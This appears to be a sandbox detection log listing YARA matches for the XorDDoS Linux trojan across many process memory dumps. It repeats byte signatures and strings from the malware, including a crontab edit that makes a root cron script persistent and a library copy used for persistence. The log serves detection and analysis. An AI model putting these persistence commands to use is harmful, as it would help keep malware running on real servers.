6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6561.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6561.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6561.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6561.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6561.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6561.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6561.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6520.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6520.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6520.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6520.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6520.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6520.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6520.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6530.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6530.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6530.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6530.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6530.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6530.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6530.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6238.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6472.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6358.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6358.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6358.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6358.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6358.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6358.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6358.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
